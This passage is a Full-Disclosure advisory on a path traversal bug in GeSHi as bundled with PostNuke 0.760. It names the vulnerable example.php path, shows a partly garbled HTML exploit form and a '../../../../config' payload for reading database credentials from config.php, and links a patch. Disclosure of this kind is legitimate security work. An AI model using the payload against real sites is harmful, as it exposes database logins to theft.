I have tested this bug in GeSHi package and in PostNuke 0.760.
PostNuke 0.760 (file: ./modules/pn_bbcode/pnincludes/contrib/example.php)
We can read config.php in PostNuke where we have login, password, dbname and
dbhost.
All variables needed to log in to database.
So we can just use this exploit below :
- --- EXPLOIT TESTED IN POSTNUKE 0.760 ---
http://securityreason.com";
target="http://securityreason.com/";>http://securityreason.com/gfx/small_logo.png";>
http://[HOST]/modules/pn_bbcode/pnincludes/contrib/example.php";
method="post">
Path to file:
example: ../../../../config
- --- EXPLOIT FOR POSTNUKE 0.760 ---
[HOST] = example. http://www.securityreason.com/postnuke/html
any questions? ;]
- --- 2. How to fix ---
Patch
http://securityreason.com/patch/2
works in PostNuke 0.760
or new version of script 1.0.7.3
- --- 3. Greets ---
sp3x
- --- 4.Contact ---
Author: Maksymilian Arciemowicz < cXIb8O3 >
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG-KEY: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (FreeBSD)
iD8DBQFDMuOr3Ke13X/fTO4RAtIPAJ9eYAoID8idUKarOBdV2ndLcy0VPgCgmvIm
MWVTap2Adcne2IMt7OpZHmM=
=JulS
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
